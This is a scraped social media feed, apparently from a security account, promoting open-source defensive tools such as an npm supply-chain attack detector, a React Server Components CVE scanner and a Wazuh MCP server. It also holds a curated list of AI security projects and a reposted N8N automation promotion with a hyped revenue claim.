GenSecAI

Hit our first milestone today — Shai-Hulud 2.0 Detector just crossed 100 ⭐ on GitHub! What started as a small effort to help teams detect Shai-Hulud-style supply chain abuse is now getting real traction from the community. Onwards and upwords ! github.com/gensecaihq/Sha…

CVE-2025-55182 Scanner Released : react2shell-guard - Free, open-source scanner for the critical React Server Components RCE vulnerability (CVSS10.0) ✅ Scan lockfiles, Docker images, live URLs ✅ GitHub Actions + Vercel integration github.com/gensecaihq/rea…

The foundational language for modeling Cyber Risks. Release: zeron.one/what-is-crml-t… Github: github.com/Faux16/crml PyPi: pypi.org/project/crml-l… #opensource #crq #cyberiskmodeling #foundationalmodel @cyberriskall @OpenSourceOrg @GithubProjects @alokemajumder @securezeron

Shai-Hulud 2.0 Detector v2.0.0 released. What's new: • SHA256 hash matching (Datadog IOC database) • on:discussion workflow trigger detection • .dev-env/ runner installation scanning • actionsSecrets.json exfil detection GitHub Action → github.com/gensecaihq/Sha…

The opensource project Sense-AI (where I’m just a contributor) is being showcased at @Blackhatmea , led by @infosecsanket . If you’re around, go check it out and say hi to him! github.com/Faux16/sense-ai #OpenSource #CyberSecurity #InfoSec #BlackHatMEA2025

ShadowGate is now open source. Stealth redirector + deception gateway written in Go. github.com/gensecaihq/sha…

AI Security Tools - November 2025 🧰 awesome-claude-skills - Curated Claude Skills collection with a Security & Systems section wiring Claude into web fuzzing, MCP hardening, and security automation workflows. ⭐️5.5k github.com/ComposioHQ/awe… by @composiohq - @prathitjoshi_, @Evyatar_Bluzer, @LeoVS09, Hong Cing Chen 🧰 IoT HackBot - IoT security toolkit combining Python CLI tools and Claude Code skills for automated discovery, firmware analysis, and exploitation-focused testing of IoT devices. ⭐️339 github.com/BrownFineSecur… by Brown Fine Security - @nmatt0 🧰 PatchEval - Benchmark for evaluating LLMs and agents on patching real-world vulnerabilities using Dockerized CVE testbeds and automated patch validation. ⭐️138 github.com/bytedance/Patc… by @BytedanceTalk - Jun ZENG, Zichao Wei, Shiqi Zhou 🧰 VulnRisk - Open-source vulnerability-risk assessment platform providing transparent, context-aware scoring beyond CVSS — ideal for local development and testing. ⭐️84 github.com/GurkhaShieldFo… 🧰 Wazuh-MCP-Server - Exposes Wazuh SIEM and EDR telemetry via Model Context Protocol so LLM agents can run threat-hunting and response playbooks against real data. ⭐️83 github.com/gensecaihq/Waz… by @GensecAI 🧰 mcp-checkpoint - Continuously secures and monitors Model Context Protocol operations through static and dynamic scans, revealing hidden risks in agent-tool communications. ⭐️81 github.com/aira-security/… by @Aira_Security 🧰 ai-reverse-engineering - AI-assisted reverse engineering tool letting an MCP-driven chat interface orchestrate Ghidra to analyze binaries for security research. ⭐️42 github.com/biniamf/ai-rev… by @TIIuae - @biniamfisseha 🧰 whisper_leak - Research toolkit showing how encrypted, streaming LLM conversations leak prompt information via packet sizes and timing; includes capture, training, and benchmark pipeline. ⭐️42 github.com/yo-yo-yo-jbo/w… by @yo_yo_yo_jbo 🧰 AI / LLM Red Team Field Manual & Consultant’s Handbook - Red-team playbook and consultant’s guide with attack prompts, RoE/SOW templates, OWASP/MITRE mappings, and testing workflows. ⭐️26 github.com/Shiva108/ai-ll… by @PenTestThor 🧰 LLMGoat - Deliberately vulnerable LLM lab for practicing and understanding OWASP Top 10 LLM vulnerabilities. ⭐️36 github.com/SECFORCE/LLMGo… by @SECFORCE_LTD - @thelicato, António Quina, Rodrigo Fonseca 🧰 Reversecore_MCP - Security-first MCP server empowering AI agents to orchestrate Ghidra, Radare2, and YARA for automated reverse engineering. ⭐️25 github.com/sjkim1127/Reve… 🧰 system-prompt-benchmark - Testing harness that runs LLM system prompts against 287 prompt-injection, jailbreak, and data-leak attacks using an Ollama-based judge. ⭐️3 github.com/KazKozDev/syst… by @KazKozDev 🧰 ctrl-alt-deceit - Extends MLEBench with sabotage tasks and monitoring tools to evaluate LLM agents that tamper with code, benchmarks, and usage logs. ⭐️3 github.com/TeunvdWeij/ctr… by @apolloaievals @Teun_vd_Weij 🧰 SOC-CERT AI Helper - Chrome extension using Gemini Nano and KEV-backed CVE enrichment to detect and prioritize web threats in-browser. ⭐️1 github.com/joupify/soc-ce… by joupify 🧰 aifirst-insecure-agent-labs - Chatbot agent exploit lab for practicing prompt injection, system-prompt extraction, and guardrail bypass with NeMo/regex guardrails. ⭐️1 github.com/trailofbits/ai… by @trailofbits - @willvandevanter 🧰 llm-security-framework - Security framework for AI-assisted development with tiered checklists, threat models, and docs to harden small AI projects quickly. ⭐️0 github.com/annablume/llm-… by Anna Blume

Shai-Hulud 2.0 Detector started as a response to a massive npm supply chain attack. Now it's a community-powered security tool with contributions from devs worldwide. Scan your repos. Protect your secrets. Stay safe. Free. Open source. One YAML line. github.com/marketplace/ac…

75 ⭐️and growing on Shai-Hulud 2.0 Detector! A free GitHub Action protecting devs from the npm supply chain attack . One line in your workflow. Zero compromised dependencies. github.com/gensecaihq/Sha… #opensource

Shai-Hulud 2.0 Detector is now on GitHub Marketplace! Protect your projects from the npm supply chain attack ✅ 790+ compromised packages ✅ Malicious script detection ✅ SARIF reports for Security tab Free & open source. github.com/marketplace/ac… @wbfoss

I prefer self-hosted AgentBuilders. Because control > convenience. I want to know where the prompts live, who can see the logs, and how the data flows. When agents start touching code, infra, or customer data. Self-hosting isn’t a choice . It’s posture.

Calling #Python developers & #Wazuh admins! The Wazuh- #MCP-Server project is solid and running — but we’re looking to take it further.
We need contributors, testers & real-world use cases. 🛠️ Help us improve it:
👉 github.com/gensecaihq/Waz… #GenAI #Claude

What if instead of teaching AI about your protocol every time, it already knew? 🧵 Built the MCP Developer SubAgent - 8 specialized AI agents that understand Model Context Protocol from day one. The results are wild... github.com/gensecaihq/MCP… @GithubProjects

The latest Wazuh-MCP-Server v2.1.0 lets you query your Wazuh data using #Claude Desktop , etc. Now supports 29+ tools: CVE checks, agent health and more. 🔗 github.com/gensecaihq/Waz…
#Wazuh #LLM #MCP #OpenSource

Hey @wazuh — we’ve built an open-source Wazuh MCP Server to integrate Model Context Protocol into Wazuh for GenAI capabilities. Would love your help in reaching the Wazuh community for testing, feedback & contributions! 🔗 github.com/gensecaihq/Waz…

@ShubhamInTech Thanks, please feel free to contribute. 👍

@GensecAI loved it!

Just plugged Claude into our Wazuh MCP Server – and it’s working like a charm! 📸 Screenshot below. 🛠️ Repo: github.com/gensecaihq/Waz… #Wazuh #MCP #ClaudeAI #GenAI #CyberSecurity #OpenSource #MCP

@SubhaghV N8N

This N8N Youtube Agent generated $100k in 60 days While you're still brainstorming titles and editing videos manually… This AI Agent is pulling video prompts from Google Sheets, generating videos with Google Veo3, writing SEO titles using GPT-4o, uploading to YouTube, and updating your spreadsheet without you touching a thing. It doesn’t just automate, It becomes your 24/7 content production machine Here’s what this N8N beast does: - Reads video prompts directly from Google Sheets - Uses Veo3 to generate high-quality AI videos - Auto-creates click-worthy titles with GPT-4o - Waits, checks status, and processes completion hands-free - Stores finished videos in Google Drive for backup - Uploads to YouTube with proper metadata, no extra tools needed - Updates the sheet with both video file and YouTube link - Scales infinitely just keep adding prompts - Requires ZERO code to run This isn’t Zapier + CapCut + human VAs duct-taped together. It’s a full-stack, API-first, YouTube machine powered by N8N. While others pay $20K+ for similar systems, you'll own this forever with zero fees. Just import the JSON files into your N8N instance and watch it work. If you’re tired of content bottlenecks and want a truly hands-off YouTube engine… This is the cheat code. Comment “N8N” + RT + Like I’ll DM you the full N8N workflow (Must be following) Or keep wasting hours editing thumbnails while someone else gets 100K views sleeping

Turn your #SIEM into an AI storyteller! #Wazuh-#MCP-Server pipes live Wazuh alerts into any LLM via MCP so models can triage threats for you. Looking for #infosec devs & blue-teamers to break, tweak & star it 👉 github.com/gensecaihq/Waz… #OpenSource #CyberSecurity